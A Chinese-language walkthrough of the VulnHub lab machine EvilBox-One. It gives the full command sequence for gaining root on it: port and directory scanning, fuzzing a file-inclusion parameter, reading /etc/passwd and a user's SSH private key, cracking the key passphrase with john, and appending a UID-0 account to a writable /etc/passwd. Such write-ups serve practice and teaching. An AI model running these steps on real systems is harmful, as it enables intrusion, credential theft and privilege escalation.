一、介绍
运行环境:Virtualbox
攻击机:kali(10.0.2.15)
靶机:EvilBox-One(10.0.2.25)
目标:获取靶机root权限和flag
靶机下载地址:https://www.vulnhub.com/entry/evilbox-one,736/
二、信息收集
使用nmap主机发现靶机ip:10.0.2.25
使用nmap端口扫描发现靶机开放端口:22、80
打开网站发现是一个apache2的默认页面,参考源码没有发现隐藏信息。
使用dirsearch爆破目录,发现一个/secret/目录和robots.txt文件
查看robots.txt,里面信息:Hello H4x0r
怀疑H4x0r为一个用户名,使用hydra工具进行ssh暴力破解,破解了几个小时没破解出来,可能思考的方向错了
使用dirsearch对/secret/目录进行扫描,发现什么也没扫出来,使用dirbuster工具再次尝试,爆破得到路径/secret/evil.php
对/secret/evil.php文件进行FUZZ爆破,得到一个参数
wfuzz -w /usr/share/wordlists/wfuzz/general/common.txt http://10.0.2.25/secret/evil.php?FUZZ=/etc/passwd 
三、漏洞利用
尝试文件包含ssh登录日志文件,包含失败,可能没有访问ssh日志权限
查看/etc/passwd文件,查看靶机还存在哪些用户,发现靶机除了root用户还存在用户:mowree
知道存在mowree用户,可以尝试包含mowree用户的ssh私钥,或使用hydra对该用户的ssh密码进行暴力破解
包含/home/mowree/.ssh/id_rsa,包含成功,得到mowree用户的私钥,可以提供私钥登录ssh
http://10.0.2.25/secret/evil.php?command=/home/mowree/.ssh/id_rsa
创建id_rsa文件,将私钥内容复制下来,保存到该文件,并对该文件赋予权限。尝试使用ssh登录,发现文件缺少密码。
chmod 600 id_rsa
ssh -i id_rsa mowree@10.0.2.25
通过ssh2john转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。
ssh2john id_rsa > passwd.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt
破解成功获得密码:unicorn
登录ssh成功
四、提权
查看是否有可利用的特权命令和具有root权限的文件,发现没有。
翻一翻靶机的文件,看看有没有可利用的,发现/etc/passwd具有写权限,可以passwd提权
Linux系统中的每个用户都在/etc/passwd文件中有一个对应的记录行,它记录了这个用户的一些基本属性。这个文件对所有用户都是可读的。它是一个以冒号分隔的文件,按顺序其包含的信息如下:
用户名
加密密码
用户 ID (或 UID)
组 ID (或 GUID)
用户全名
用户家目录
登录 Shell
尝试写入passwd文件以使我们成为root用户。
我们将向passwd文件添加一个用户,并在相应的字段中显式地给出加密密码。你可以使用perl语言生成带有salt的加密密码:adrla7IBSfTZQ
perl -le 'print crypt("123456","addedsalt")'
然后执行下面这条命令,成功将test用户的信息加入 /etc/passwd 文件
echo "test:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
切换test用户su test,密码为123456
获取flag
